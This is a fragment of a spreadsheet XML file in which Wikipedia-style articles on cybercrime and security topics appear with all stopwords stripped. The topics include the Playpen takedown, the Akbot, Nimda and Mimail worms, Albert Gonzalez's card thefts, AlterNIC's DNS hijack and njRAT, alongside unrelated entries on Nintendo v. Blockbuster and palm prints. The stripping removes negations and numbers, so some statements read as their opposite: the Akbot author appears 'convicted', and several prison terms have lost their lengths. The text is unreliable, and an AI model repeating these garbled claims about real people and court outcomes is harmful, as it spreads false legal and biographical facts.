carnegie mellon million exploit carnegie mellon also denied receiving money. also anonymizer operation disruptor references external links united states america blake benthall a/k/a "defcon," defendant. sealed complaint operator "silk road 2.0" website charged manhattan federal court, department justice press release dozens online "dark markets" seized pursuant forfeiture complaint filed manhattan federal court conjunction arrest operator silk road 2.0, department justice press release archives: operation onymous deepdotweb</t>
  </si>
  <si>
    <t>Operation Pacifier</t>
  </si>
  <si>
    <t>playpen notorious darknet child pornography website operated august 2014 march 2015. website operated hidden service network allowed users website anonymously. after running website months, website owner steven chase captured fbi. after capture, continued website another days part operation pacifier. when shut march 2015, site 215,000 users hosted 23,000 sexually explicit images videos children young toddlers. website shutdown shutdown operation, called operation pacifier, involved hijacking site continuing serve content weeks (from february 2015 march 2015). during time used malware-based "network investigative technique" hack browsers users accessing site, thereby revealing identities. operation arrest site users five prison sentences. while claimed knowledge existence website right beginning, unable track servers locations site owner. reason struggle fact playpen hosted hidden service tor. only mishap site owner revealing address finally allowed enforcement track page personnel. convictions investigation sentencing steven chase, 57-year-old florida created website, years prison 2017. co-defendants pleaded guilty sentenced years earlier 2017 involvement playpen.all people used site google microsoft accounts deleted. 2017, charges dropped member site, court demanded details hacking tool released. preferred keep (network investigative technique) malware secret future investigations. shutdown criticisms investigation criticized electronic frontier foundation because, taken control website, continued nearly weeks operate website thus distribute child pornography, i.e. exactly crime bureau sought stop. lawyer defendant case stated operated website, improved number visitors rose sharply control.challenges raised fbi's possibly severe misuse initial search warrant, leading likely dismissal much gathered evidence defendant. august 2019, eleventh circuit court appeals ruled warrant invalid evidence obtained required excluded good-faith exception doctrine. references external links electronic frontier foundation frequently asked questions playpen case</t>
  </si>
  <si>
    <t>Mimail</t>
  </si>
  <si>
    <t>mimail computer worm first emerged august 2003; transmitted e-mail. since initial release, nearly dozen variants original mimail worm appeared. mydoom worm, emerged january 2004, initially believed variant mimail. mimail written programming language. external links w32.mimail.a@mm symantec.</t>
  </si>
  <si>
    <t>Akbot</t>
  </si>
  <si>
    <t>akbot computer virus infected estimated million computers added botnet. created 18-year-old named owen walker, charged unconvicted 2008. infection akbot controlled backdoor program. allows outside user take control infected computer. akbot operates joining servers waiting instructions. once installed, akbot used gather data, kill processes, perform ddos attacks. sources author, 18-year-old zealand based master, owen walker ("akill"), caught international investigation, operation: roast, home raided zealand police agent. charged april 2008, convicted court believe motives criminal. references</t>
  </si>
  <si>
    <t>Albert Gonzalez</t>
  </si>
  <si>
    <t>albert gonzalez (born 1981) american computer hacker computer criminal accused masterminding combined credit card theft subsequent reselling million card numbers 2005 2007: biggest fraud history. gonzalez accomplices used injection deploy backdoors several corporate systems order launch packet sniffing (specifically, spoofing) attacks allowed steal computer data internal corporate networks.during spree, said thrown $75,000 birthday party complained count $340,000 hand currency-counting machine broke. gonzalez stayed lavish hotels formal homes modest.gonzalez three federal indictments. first 2008 york dave busters case (trial schedule september 2009). second 2008 massachusetts maxx case (trial scheduled early 2010). third august 2009 jersey connection heartland payment case.on march 2010, gonzalez sentenced years federal prison.gonzalez, along team, featured 5th-season episode cnbc series american greed titled: "episode hackers: operation rich tryin’". early life education gonzalez bought first computer time managed hack nasa. attended south miami high school miami, florida, described "troubled" pack leader computer nerds. 2000, moved york city, lived three months moving kearny, jersey. hacking career shadowcrew while kearny, accused mastermind group hackers called shadowcrew group, trafficked million stolen credit card numbers. although considered mastermind scheme (operating site screen name "cumbajohnny"), indicted. according indictment, 4,000 people registered shadowcrew.com website. once registered, could stolen account numbers counterfeit documents auction, read “tutorials how-to’s” describing cryptography magnetic strips credit cards, debit cards cards numbers could used. moderators website punished members abide site's rules, including providing refunds buyers stolen card numbers proved invalid.in addition card numbers, numerous objects identity theft sold auction, including counterfeit passports, drivers’ licenses, social security cards, credit cards, debit cards, birth certificates, college student identification cards, health insurance cards. member sold million e-mail accounts associated usernames, passwords, dates birth, personally identifying information. most indicted members actually sold illicit items. members maintained moderated website also indicted, including attempted register domain name shadowcrew.cc.the secret service dubbed investigation "operation firewall" believed $4.3 million stolen, shadowcrew shared information groups entitled carderplanet darkprofits. investigation involved units united states, bulgaria, belarus, canada, poland, sweden, netherlands ukraine. gonzalez initially charged possession fake credit debit cards newark, jersey, though avoided jail time providing evidence united states secret service cohorts. shadowcrew members indicted. gonzalez returned miami. companies hack while cooperating authorities, said masterminded hacking companies, 45.6 million credit debit card numbers stolen 18-month period ending 2007, topping 2005 breach million records cardsystems solutions. gonzalez others sought targets wardriving seeking vulnerabilities wireless networks along u.s. route miami. they compromised cards bj's wholesale club, dsw, office max, boston market, barnes noble, sports authority t.j. maxx. indictment referred gonzalez screen names "cumbajohny", "201679996", "soupnazi", "segvec", "kingchilli" "stanozlolz." hacking embarrassment maxx, discovered breach december 2006. company initially believed intrusion began 2006, investigation revealed breaches dating back july 2005.one alleged co-conspirators 7-foot-tall stephen watt, known hacker world "unix terrorist" "jim jones." watt worked morgan stanley york city wrote sniffer program. arrest gonzalez arrested 2008 charges stemming hacking dave buster's corporate network point sale location restaurant islandia, york. incident occurred september 2007. about 5,000 card numbers stolen. fraudulent transactions totaling $600,000 reported cards.authorities became suspicious conspirators kept returning restaurant reintroduce hack, would restart company computers shut down.gonzalez arrested room 1508 national hotel miami beach, florida. various related raids, authorities seized $1.6 million cash (including $1.1 million buried plastic bags three-foot drum parents' backyard), laptops compact glock pistol. officials said that, time arrest, gonzalez lived nondescript house miami. taken metropolitan detention center brooklyn, indicted heartland attacks. co-defendants gonzalez multiple co-defendants dave buster's thefts. main ones charged sentenced follows: stephen watt charged providing data theft tool identity theft case. sentenced years prison years supervised release. also ordered court back $250,000 restitution. damon patrick toey pleaded guilty wire fraud, credit card fraud, aggravated identity theft received five-year sentence. christopher scott pleaded guilty conspiracy, unauthorized access computer systems, access device fraud identity theft. sentenced seven years. heartland payment systems hack august 2009, gonzalez indicted newark, jersey charges dealing hacking heartland payment systems, citibank-branded 7-eleven atm's hannaford brothers computer systems. heartland bore brunt attack, million card numbers stolen. hannaford million numbers stolen. retailers disclosed indictment; however, gonzalez's attorney told storefrontbacktalk retailers j.c. penney target corporation. heartland reported lost $12.6 million attack including legal fees. gonzalez allegedly called scheme "operation rich tryin."according indictment attacks, gonzalez unidentified hackers near russia" along unindicted conspirator "p.t." miami, began december 2007, heartland payment systems, august 2007 7-eleven, november 2007 hannaford brothers unidentified companies.gonzalez cohorts targeted large companies studied check terminals attacked companies internet-connected computers jersey, illinois, latvia, netherlands ukraine.they covered attacks internet using messaging screen name, storing data related attacks multiple hacking platforms, disabling programs logged inbound outbound traffic hacking platforms, disguising, proxies, internet protocol addresses attacks originated. indictment said hackers tested program anti virus programs.rene palomino jr., attorney gonzalez, charged blog york times website indictment arose squabbling among u.s. attorney offices york, massachusetts jersey. palomino said gonzalez negotiations york massachusetts plea deal connection t.j. maxx case jersey made indictment. palomino identified unindicted conspirator "p.t." damon patrick toey, pleaded guilty t.j. maxx case. palomino said toey, rather gonzalez, ring leader heartland case. palomino said, “mr. toey cooperating since one. staying (gonzalez’s) apartment. this whole creation toey’s idea...it baby. this albert gonzalez. know fact wasn’t involved chains hacked jersey.”palomino said unnamed russian hackers heartland case maksym yastremskiy, also indicted t.j. maxx incident serving years turkish prison charge hacking turkish banks separate matter. investigators said yastremskiy gonzalez exchanged messages gonzalez paid $400,000 e-gold.yastremskiy arrested july 2007 turkey charges hacking banks turkey. secret service investigation used build case gonzalez including sneak peek covert review yastremskiy's laptop dubai 2006 review disk image latvia computer leased cronos alleged used attacks.after indictment, heartland issued statement saying know many card numbers stolen company u.s. government reached million number. plea bargain august 2009, gonzalez's attorney filed papers united states district court district massachusetts boston indicating would plead guilty charges u.s. albert gonzalez, 08-cr-10223, case (the maxx case). according reports plea bargain would "resolve" issues york case u.s. yastremskiy, 08-cr-00160 united states district court eastern district york (the dave busters case).gonzalez asked leniency grounds suffered asperger syndrome, attorney submitted report psychiatrist describing gonzalez's actions “consistent description asperger’s disorder” “internet addiction.” march 2010, u.s. district judge patti saris sentenced gonzalez years prison hacking stealing information tjx, office max, dave busters restaurant chain, barnes noble string companies. next day, u.s. district court judge douglas woodlock sentenced years connection heartland payment systems case. sentences ordered concurrently, meaning gonzalez serve total years cases. gonzalez also ordered forfeit $1.65 million, condominium miami, blue 2006 330i automobile, toshiba laptop computers, glock firearm, nokia cell phone, tiffany diamond ring three rolex watches.on march 2011, gonzalez filed motion u.s. district court boston withdraw guilty plea. claimed time committed crimes, assisting united states secret service seeking international cybercriminals said attorneys failed advise could therefore used “public authority” defense. secret service declined comment gonzalez's motion.gonzalez currently serving 20-year sentence lexington, medical facility. scheduled release december 2025. also list computer criminals references external links https://www.wired.com/images_blogs/threatlevel/2009/08/gonzalez.pdf heartland payment systems http://fm.cnbc.com/applications/cnbc.com/resources/editorialfiles/2012/04/19/ags5-e40c1-skmbt-c45110120712520-v1.pdf</t>
  </si>
  <si>
    <t>AlterNIC</t>
  </si>
  <si>
    <t>alternic unofficial, controversial internet domain name registry relied alternative root. primary purpose project challenge monopoly internic, official governing body generic top-level domains (gtlds) creation icann 1998. alternic offered second level domain registration tlds lower prices internic. however, domain names could resolved name servers specifically configured alternic root zone. project defunct; domain name alternic.net parked longer associated alternic. history eugene kashpureff diane boling created alternic 1995, defining privately developed operated internet network information center domain name registry service, purpose enhancing internet information services.in mid-1990s, internet governance transition phase. until then, organizational structure network still heavily influenced military, academic governmental origins. time, rapidly increasing interest private companies, followed general public, gain access internet. domain names began play crucial role business visibility, number registrations grew exponentially. initially, registration domain names maintenance involved direct costs registrant. 1995, national science foundation authorized network solutions (nsi), private company mandated maintain operate registries, begin charging registrants annual fee. some perceived move unfair, given market closed competitors. eugene kashpureff company among decided create alternative registry challenge monopoly nsi. alternative tlds alternic started operating registries even though name servers included internet official root zone. result, users manually reconfigured name servers able resolve alternic names. alternic offered several dozens alternative tlds, .alt .biz (unrelated subsequent, official .biz gtld created icann) .corp .eur (european name services, netname) .fam .fcn (free community network cost charities non-profits. inactive.) .free .sex .usa (designed competitor official .us) .wtv (world tele virtual network commercial internet inactive.) .xxx (unrelated .xxx first approved, revoked icann, approved again)during experimental phase, domains could registered without fees using .exp .lnx tlds. some tlds .ltd, .med .xxx operated directly alternic. setup alternic registries $50. annual $24, half charged yearly .com .net domain ($15 retained government fund). notable feature alternic possibility request custom price registrations existing tlds. established publishing groups requested names: wired magazine reserved .wired idg's affiliate europe reserved .idg controversy part internet community praised initiative, recent scholarship proposing alternative roots allow democratic network control structure. many others considered harmful internet. using alternative root breaks principle universal resolvability, unless strictly private purpose. from perspective, prevents parts internet reaching parts. postel, significant contributor internet standards, asserted would lead chaos. 2000, internet architecture board spoke strongly alternative roots 2826. hijacking internic's website july 1997, advice alternic colleagues, kashpureff hijacked internic website, redirecting affected visitors alternic website instead, could read alternic protest click link internic page. kashpureff stopped hijacking three days later july started july this nsi, operator internic website, file lawsuit kashpureff. civil lawsuit quickly settled, also contacted investigate whether kashpureff broken federal computer crime laws. october arrested toronto u.s. charges related wire fraud faced extradition united states. after fighting extradition months, waived rights, extradited york city. released december given $100 fine sentenced years probation. hijacking made possible using cache poisoning attack, exploiting security vulnerability versions bind earlier 4.9.6. references external links list alternic.net wayback machine (archive index) (their last copy domain began used advertising "archived copy". archived original april 1999. retrieved june 2005.{{cite web}}: maint: archived copy title (link) maint: bot: original status unknown (link)) eugene kashpureff's personal homepage senator hearing cyber crime, referenced prosecuting eugene kashpureff brooklyn federal court charges wired fraud</t>
  </si>
  <si>
    <t>Nik Cubrilovic</t>
  </si>
  <si>
    <t>cubrilovic australian former hacker leading internet security blogger. personal life cubrilovic (serbian: čubrilović) ethnic serb. work 2011 successfully forced facebook address privacy flaw whereby site would continue track surfing habits even logged out.in 2014 published research weakness australian government's my.gov.au websites illustrating number flaws allowing user impersonation, issues finally fixed january 2015.in september 2014 provided analysis various security vectors phishing, searching public social media sites weaknesses apple's icloud software used 2014 celebrity photo hack going consult number publications matter.in november 2014 analysis hidden services seized operation onymous cast doubt official figures enforcement effectiveness operation, claiming services seized, scam clone sites.he provided various coverage commentary dark matters silk road trial.in january 2018 arrested alleged hacking goget, sharing company. references external links nikcub.me cubrilovic twitter</t>
  </si>
  <si>
    <t>Nilsimsa Hash</t>
  </si>
  <si>
    <t>nilsimsa anti-spam focused locality-sensitive hashing algorithm originally proposed cmeclax remailer operator 2001 reviewed ernesto damiani 2004 paper titled, open digest-based technique spam detection". goal nilsimsa generate hash digest email message digests similar messages similar other. comparison cryptographic hash functions sha-1 md5, making small modification document substantially change resulting hash document. paper suggests nilsimsa satisfies three requirements: digest identifying message vary significantly (sic) changes produced automatically. encoding must robust intentional attacks. encoding support extremely risk false positives.subsequent testing range file types identified nilsimsa hash significantly higher false positive rate compared similarity digest schemes tlsh, ssdeep sdhash. nilsimsa similarity matching taken consideration jesse kornblum developing fuzzy hashing 2006, used algorithms spamsum andrew tridgell (2002).several implementations nilsimsa exist open-source software. references</t>
  </si>
  <si>
    <t>Nimda</t>
  </si>
  <si>
    <t>nimda malicious file-infecting computer worm. quickly spread, surpassing economic damage caused previous outbreaks code red. first released advisory thread (worm) released september 2001. release date, exactly week attacks world trade center pentagon, media quickly began speculating link virus qaeda, though theory ended proving unfounded.nimda affected user workstations (clients) running windows 2000, servers running windows 2000.the worm's name comes reversed spelling "admin".f-secure found text "concept virus(cv) v.5, copyright(c)2001 r.p.china" nimda code, suggesting country origin. however, also noted computer canada responsible october 2001 release infected emails alleging mikko hyppönen data fellows (f-secure's previous name). methods infection nimda effective partially it—unlike infamous malware like code red—uses five different infection vectors: email open network shares browsing compromised sites exploitation various internet information services (iis) directory traversal vulnerabilities. (both code nimda hugely successful exploiting well known long solved vulnerabilities microsoft server.) back doors left behind "code "sadmind/iis" worms. also mixed threat attack timeline notable computer viruses worms references external links cert advisory nimda antivirus vendor f-secure's info nimda</t>
  </si>
  <si>
    <t>Nintendo of America, Inc. vs. Blockbuster LLC.</t>
  </si>
  <si>
    <t>august 1989, nintendo america filed american copyright lawsuit district court newark, jersey blockbuster llc, seeking injunctive relief damages. dispute raised multiple blockbuster locations across united states america accused allegedly photocopying reproducing nintendo's video game manuals renting nintendo titles. game company claimed infringement intellectual property, hoped change laws renting video games rentals. after year battle district court, court ruled favor blockbuster, house senate verdicts determined video game rentals remain unchanged. background nintendo 1989 1989 nintendo prioritised release game handheld system, appearing japanese market april 1989, alongside title super mario land. system later released july 1989, north america, president nintendo america minoru arakawa seeking bundle game third-party title tetris. securing deal, console launched instant success. japan, titles mother zelda game watch released nintendo. north america, nintendo america introduced dragon warrior franchise, series three games previously released japan nes. estimated 1989, nintendo sold $2.7 billion video game software games, accounting market. this number include toys, apparel miscellaneous merchandise nintendo beginning introduce market. peter main, vice president nintendo america time named "marketer year" adweek's marketing week magazine, estimated million homes america possession nintendo product; estimation raising million consideration post-christmas season. rick anguila, editor business world, said nintendo products america: "the kids america saying 'this great, we've one.' boys country ages nintendo like baseball bat.''. every four houses america nintendo product. nintendo's previous legal history nintendo japan nintendo america recognised 'complicated' legal history, involved cases forward company imposed them. 1984, nintendo sued universal studios infringed copyright claim, universal claimed game donkey kong trademark infringement movie king kong film released years prior suit. united states district court southern district york ruled favor nintendo, company proved prior legal case characters plot film available public domain, holistically owned universal.in 1989, nintendo legal battle company tengen tetris game copyrights, forced tengen recall unlicensed copies game. nintendo sues tengen november number unlicensed nintendo games. nintendo wins again. blockbuster 1989 founded david cook years previous, blockbuster slowly growing stores established across united states. john melk, associate wayne huizenga waste management, success business attracted family friendly image business model. pushed huizenga invest, 1987 agreed stores, despite reservations entering video rental industry. combining techniques learned work waste management following kroc's business expansion model, huizenga melk worked expand blockbuster substantially across america. 1989, estimated store opening approximately every hours. this included first store opening march 1989 walmart road, london. blockbuster's estimated revenue 1989 $600 million cementing brand 'king' video rental industry, closest rival west coast video ltd. turned $180 million profit. copyright video games nintendo, security product always highly coveted. 1984, recording industry association japan successfully implemented rental right, right lending japanese copyright law, allowing makers product brand specifically allocate product reproduced used rental stores services, implementing terms conditions. nintendo, line law, allow rental stores japan rent products, continue hold strict copy' policy products, brand associations.in america 1989 however, renting video games considered differently, copyright united states clause specific video game rentals. music industry protected rental records amendments act, music rentals completely banned. video, television movies created extremely successful rental business, annual revenue 1988 estimated billion; surpassing office revenue $4.5 billion. video rental stores sought profit success video games, created rental sections rent software titles. there divided opinion video game rental, especially general consumer industry. howard lincoln, serves vice president nintendo america, went record david sheff's book game over: nintendo zapped american industry, captured your dollars, enslaved your children said video game rental "nothing less commercial rape." general consumer many benefits renting video game software; whole game cost fair amount money, gave people opportunity game investing computer software industry facing similar issue rentals, sought gain protection computer software rental amendments act. theory, bill cover video games software well, video software dealer's association excluded video games final draft. vsda determined leave video games bill, fact, determined defeat bill video games included. this justified belief nintendo cartridges extremely difficult copy reproduce, unlike normal computer software could replicated hard drives discs. lawsuit july 1989, nintendo america sent letter request blockbuster llc., learning stores photocopying reproducing nintendo's video game manuals paired game rentals. august 1989, nintendo claiming request ignored filed formal lawsuit blockbuster jersey federal court, claim copyright breached. suit charges least company owned store three franchises within jersey photocopied gaming manuals rent consumers respected games. nintendo's general counsel lynn hvalsoe said prepared statement, "the photocopying nintendo's game instruction manuals video rental outlets infringes nintendo's registered copyrights... intend stop illegal practice".blockbuster reacted negatively suit, calling "reflection frustration [nintendo] feel," removed computer software rental amendments act. blockbuster sought alternatives photocopying manuals, still needed produce renters returned booklets either lost damaged. robert guerin, vice president blockbuster's national development, stated need might even consider writing [manuals],". company pursue course action, deeming waste resources video games made annual profits. instead, replaced nintendo original manuals generic copies made third-party companies. outcome august blockbuster filed court papers compliance nintendo's request ceasing photocopying manuals, released statement claiming contacted managers blockbuster stores stop copying manuals original letter request received july both companies settled matter outside court undisclosed amount, nintendo still hoped inclusion computer software rentals amendment act. september 1990, revision case, house senate ruled favor blockbuster, agreed rental video games widely allowed. november, houses congress passed computer software rentals amendment act. nintendo remained excluded bill. nintendo blockbuster repaired business relationship lost lawsuit, collaborated throughout 1990s. this included nintendo allowing blockbuster rent sell number games made exclusive rental company's stores 1994 blockbuster video world game championship making super console throughout competition's preliminary, regional final rounds. many years, blockbuster continued rent video game consoles software, nintendo finally backed battle rentals. however, competition mail-order services netflix, video demand services redbox automated kiosks, blockbuster suffered huge profit losses early late 2000s, september 2010, filed bankruptcy protection.nintendo continues grow leading video game corporation, 5,500 employees working internationally 2017 sales earn $9.95 billion 2018. they also continue strict copyright law, large number cases taken 1989 varied success. most notable include case lewis galoob toys, inc. nintendo america, inc. nintendo sued canadian gaming company camerica ltd. patent violations game genie nes. nintendo sued camerica counterpart galoob many times, including courts canada, york california. nintendo lost every suit filed. case taken ntdec example nintendo's greatest successes court, awarded million damages. case based arrest employees ntdec 1991, convicted large-scale piracy reproducing games using nintendo trademark. 1993, case settled nintendo awarded million, subsequently driving ntdec business. also copyright video games lewis galoob toys, inc. nintendo america, inc. universal city studios, inc. nintendo co., ltd. ntdec references</t>
  </si>
  <si>
    <t>AVG AntiVirus</t>
  </si>
  <si>
    <t>antivirus (previously known avg, abbreviation anti-virus guard) line antivirus software developed technologies, subsidiary avast. available windows, macos android. history brand comes grisoft's first product, anti-virus guard, launched 1992 czech republic. 1997, first licenses sold germany introduced 1998.the free edition helped raise awareness product line. 2006, security package grew include anti-spyware technologies acquired ewido networks, anti-spyware group. technologies acquired exploit prevention labs (xpl) december 2007 incorporated company's linkscanner safe search surf technology security product range released march 2008. january 2009, technologies acquired sana security, developer identity theft prevention software. this software incorporated security product range march 2009.according technologies, company million active users worldwide, including million products services mobile devices.on july 2016, avast announced agreement acquire $1.3 billion. platform support provides antivirus free windows, antivirus macos antivirus android android devices. freemium products: they free download, install, update use, technical support premium plan must purchased. stopped providing features windows windows vista january 2019. versions require windows later; virus definitions still provided previous versions. features features common functions available modern antivirus internet security programs, including periodic scans, scans sent received emails (including adding footers emails indicating this), ability repair virus-infected files, quarantine area (virus vault) infected files held. linkscanner patent pending linkscanner technology acquired exploit prevention labs built products, provides real-time updated protection exploits drive-by downloads. linkscanner includes: search-shield safe search component places safety ratings next link google, yahoo! search results; plus active surf-shield safe surf component scans contents site real-time ensure safe opened. concerns regarding analytics made linkscanner controversial component (see "linkscanner concerns" below). linkscanner concerns when first released, linkscanner safe search feature shown cause increase traffic websites appear high search engine results pages. since linkscanner disguises scans coming internet explorer browser prescans site listed search results, website usage logs showed incorrect overinflated site visitor statistics. prescanning every link search results also caused websites transfer data usual, resulting higher bandwidth usage site operators slow performance users. initially said site administrators would able filter linkscanner traffic site statistics, leaving problem excess bandwidth usage still solved. pay-per-click advertising affected increase traffic. online shield online shield feature designed check files ensure safe. online shield also ensures safety exchanging files instant messengers voip clients.in response complaints, announced july 2008 "search-shield longer scan search result online exploits, causing spikes webmasters addressed us", releasing build date applies local blacklist, prefetches scans links clicked user. controversy 2014, numerous reports dating back 2012 safeguard toolbar installs without consent user, side effect installing applications. toolbar program appears cause significant issues considered intrusive potentially unwanted program (pup). once installed, toolbar virtually impossible remove. toolbar uninstaller function, instead re-installing add-on manually removed. consequently, many discussions blog posts described complex procedures removal toolbar, mixed results.in september 2015, announced would start tracking users profit, analyzing data sale advertising industry. this measure received criticism consumers, press security industry, many users intended software order protect spyware would expect functions spyware "hidden" security software.in december 2015, tuneup google chrome extension (automatically installed antivirus) revealed contain multiple critical security vulnerabilities. most notably, chrome users' browsing history could exposed website, cookies site user visited could read attacker, trivial cross-site scripting (xss) issues could allow website execute arbitrary code another domain). vulnerability allowed user's mail "mail.google.com" read website, financial information read user's online banking site. team fixed allowing "mysearch.avg.com" "webtuneup.avg.com" execute scripts. despite remediation, attackers could leverage attacks vulnerability found sites. april 2016, tuneup still available download website. reception antivirus free 2012 selected magazine editors' choice free antivirus category. antivirus free 2015 received editor choice badge softchamp. also internet security comparison antivirus software comparison firewalls references external links official website</t>
  </si>
  <si>
    <t>Alternative DNS root</t>
  </si>
  <si>
    <t>internet uses domain name system (dns) associate numeric computer addresses human-readable names. level domain name hierarchy, root, contains top-level domains appear suffixes internet domain names. widely used (and first) root administered internet corporation assigned names numbers (icann). addition, several organizations operate alternative roots, often referred roots. these alternative domain name systems operate root name servers commonly administer specific name spaces consisting custom top-level domains. internet architecture board (iab) spoken strongly alternative roots 2826. overview root zone consists pointers authoritative domain name servers top-level domains (tlds). root zone hosted collection root servers operated several organizations around world specific, approved list domains managed icann. contrast, alternative roots typically include pointers servers domains delegated icann, well name servers other, custom top-level domains sanctioned icann. some alternative roots operated organizations manage alternative tlds. zach bastick proposes alternative roots allowed democratic control internet: implementation alternative gtlds predates significant debate name space extension official actors, exemplifies democratising alters pace developing internet policy, nature decisions justify policy development, political dynamics user autonomy network infrastructure.: unless specifically changes resolution settings, alternative level domains generally unreachable, internet service providers provide configuration default. implementations some organizations provide alternative root services, additional top-level domains. handshake handshake decentralized implementation root zone using blockchain cryptocurrency technology create peer-to-peer alternative root name servers managed icann. unlike attempts, handshake replace existing dns; rather, seeks supplement enhance allowing anyone bid, register, manage tlds without intermediate registrar delegating authority. since root zone file records centrally managed, instead stored public blockchain, owners handshake tlds change top-level resource records delegate authoritative name servers dnssec zone signing directly.existing tlds reserved handshake blockchain resolving traditional domain names (i.e. zones .com, .org, .net, etc.) handshake node name server directed back icann's root servers. addition, 100,000 popular domains reserved handshake tlds redeemed original domain owner. namecoin namecoin blockchain cryptocurrency support alternative top-level domain .bit. opennic opennic user owned controlled alternative internic icann providing non-national democratic alternative traditional domain registries. opennic servers able resolve icann top-level domains, opennic original top-level domains, resolution alternate roots reached peering agreements. yeti project yeti project attempt build alternative root server dedicated ipv6. sponsored chinese state agency, project aims experimenting different dns-related technology enabling sovereign countries explore control internet enhance network sovereignty. .chn .chn top-level domain root server internet things (iot) network china. company developing alternative root claims china intellectual right alternative domain name root associated network, become second computer network world. claimed part "ipv9" decimal network/numeric domain name system developed innovated china. russian national domain name system russian national domain name system (russian: нсди) alternative root project started 2019 roskomnadzor, government department, gradually become mandatory isps russia. march 2021, servers located moscow internet exchange. mission project provide alternative root users internet within russia. main goal continue functioning russian internet subnetwork case disconnection rest internet (sovereign internet law). defunct implementations open root server network (orsn) open root server network (orsn) network domain name system root nameservers internet. orsn root zone information normally kept synchronization "official" root nameservers coordinated icann. orsn public servers operated community orsn, providing domain name system access freely everyone, without limitation. orsn public servers usage. "the orsn project canceled 2019 never come back." "open root server network general information project". orsn.org. archived original october 2017. retrieved july 2017. alternic alternic created icann's creation challenge monopoly internic domain name governance time. edns edns (enhanced domain name service) founded coalition isps karl denninger chicago-area mcsnet. ceased operation 1998. served following domains: (general business use), corp (corporations), (for family), (for children), (non-profit organizations), (personal domains), (web-based sites, pages). open notable challengers icann's control namespace open (open root server confederation), group grew private discussions developed public mailing list. grew large enough group decided submit application united states government dns.the organization posted bylaws articles incorporation outlining orsc's position following extensive public discussion regarding manner operated.icann chairwoman esther dyson acknowledged adopting features membership orsc response united states department commerce.orsc publishes root zone containing additional level domains found icann root zone. realnames microsoft offered realnames service internet explorer browser address bar. realnames, users internet explorer, effect domain registry. realnames shut operations 2002 following decision microsoft redirect billion page views calendar quarter realnames resolving browser address search engine. also domain name system open root server network public recursive name servers root nameserver references</t>
  </si>
  <si>
    <t>Nitol botnet</t>
  </si>
  <si>
    <t>nitol botnet mostly involved spreading malware distributed denial-of-service attacks. history nitol botnet first discovered around december 2012, analysis botnet indicating botnet mostly prevalent china estimate infections detected. china botnet found present systems came brand-new factory, indicating trojan installed somewhere assembly manufacturing process. according microsoft systems risk also contained counterfeit installation microsoft windows. september 2012 microsoft took action nitol botnet obtaining court order subsequently sinkholing 3322.org domain. 3322.org domain dynamic used botnet creators command control infrastructure controlling botnet. microsoft later settled 3322.org operator yong, allowed latter continue operating domain condition subdomains linked malware remain sinkholed. also internet crime internet security references external links analysis nitol botnet, created microsoft part operation</t>
  </si>
  <si>
    <t>Palm print</t>
  </si>
  <si>
    <t>palm print refers image acquired palm region hand. either online image (i.e. taken scanner ccd) offline image image taken paper.the palm consists principal lines, wrinkles (secondary lines), epidermal ridges. differs fingerprint also contains information texture, indents marks used comparing palm another. palm prints used criminal, forensic, commercial applications. palm prints, typically palm, often found crime scenes result offender's gloves slipping commission crime, thus exposing part unprotected hand. references media related palm prints wikimedia commons</t>
  </si>
  <si>
    <t>NjRAT</t>
  </si>
  <si>
    <t>njrat, also known bladabindi, remote access tool (rat) trojan allows holder program control end-user's computer. first found june 2013 variants traced november 2012. made hacking organization different countries called m38dhhm often used targets middle east. spread phishing infected drives. about program whereabouts surge njrat attacks reported india july 2014. attempt disable njrat's capabilities, microsoft took four million websites 2014 attempting filter traffic no-ip.com domains.in march 2016, softpedia reported spam campaigns spreading remote access trojans njrat targeting discord. october 2020, softpedia also reported appearance cracked vmware download would download njrat pastebin. terminating process would crash computer.an islamic state website hacked march 2017 display fake adobe flash player update download, instead downloaded njrat trojan. features manipulate files open remote shell, allowing attacker command line open process manager kill processes manipulate system registry record computer's camera microphone keystrokes steal passwords stored browsers applications references</t>
  </si>
  <si>
    <t>AVG Technologies</t>
  </si>
  <si>
    <t>technologies brand cybersecurity, privacy, performance utility software applications desktop computers mobile devices developed avast. cybersecurity software company founded 1991 merged avast following acquisition 2017. typically offers freeware, earning revenues advertisers users upgrade paid versions access features. founded 1990 czechoslovakia country transitioning communism capitalism. early 2000s, expanded internationally used money venture capital investments fund series acquisitions. went public york stock exchange february 2012. avast acquired $1.3 billion july 2016. history technologies founded tomáš hofer gritzbach 1990 name grisoft brno, czechoslovakia. time, czechoslovakia starting transition communism capitalism. initially, grisoft sold equipment third-party software, addition antivirus product. grisoft grew country loosened international trade policies, could exchange technology companies europe. 1998, grisoft employees.grisoft later expanded market, creating american company called avg. grisoft also expanded united kingdom, netherlands, germany, countries. time, company focused bulk sales antivirus software computer manufacturers sold grisoft's software pre-installed. started marketing software directly consumers 2006. 2008, grisoft changed name parent company avg, name already used software american subsidiary. associates invested additional $200 million company year minority stake business.in 2001, grisoft sold venture capital firm benson capital. firm sold percent interest grisoft intel capital enterprise investors million 2005. investments used fund series acquisitions. grisoft bought spyware company ewido networks 2006 browser security company exploit prevention labs 2007. 2009, announced acquisition sana security, analyzes software behavior. this followed acquisition mobile security startup droidsecurity imedix technologies 2011 parental control software company bsecure 2012, remote monitoring company level platforms 2013.avg technologies filed initial public offering february 2012. additionally, former mozilla gary kovacs appointed avg. effort create simple one-page privacy policy discloses data company collects users information free users sells advertisers.in 2014, announced acquisition location labs, cybersecurity company focused mobile devices, estimated $220 million. acquired avast $1.3 billion july 2016. time, employees, $155 million annual revenue, million users. combined entity became world's largest antivirus company, estimated market. there avast installations million mobile devices million desktop computers. combined entity incorporate technology combined software products developed channel program market small business owners. months later, american private equity firm, associates, bought percent interest $200 million.in 2015, acquired company privax israeli-based gallery company called myroll. also released software products businesses incorporate technology companies. july 2017 acquired piriform, uk-based company developed ccleaner, cleanup utility million installations. software develops markets software security, privacy, performance optimization, utility services desktop computers mobile devices. largest brands cybersecurity software.avg best-known antivirus product. antivirus freeware program relies heavily heuristic analysis determine program's code behaving like malicious software. scans computer's documents, programs, emails suspicious behavior, rates file's risk based behavior alerts user files high rating. antivirus features intended protect user's malware, phishing, viruses. also firewall, identity protection, anti-ransomware, anti-spam, webcam control features paid users.avast also develops software data backup, parental controls, services. produces variety computer optimization utility software products. example, browser extension called safeprice looks better deals online user shopping site.a majority avg's revenues come free users upgrading paid versions. controversy 2012, technologies issued copyright claim, referred 'takedown request,' youtube video 1987 song never gonna give performed british singer rick astley. video, october 2015, million views 300,000 comments, uploaded 2007, restored within hours youtube. video's name refers internet meme commonly referred 'rickrolling,' someone pranks others tricking going video. avg's browser add-on, secure search, criticized adware, since frequently bundled software often mistakenly installed, exhibits 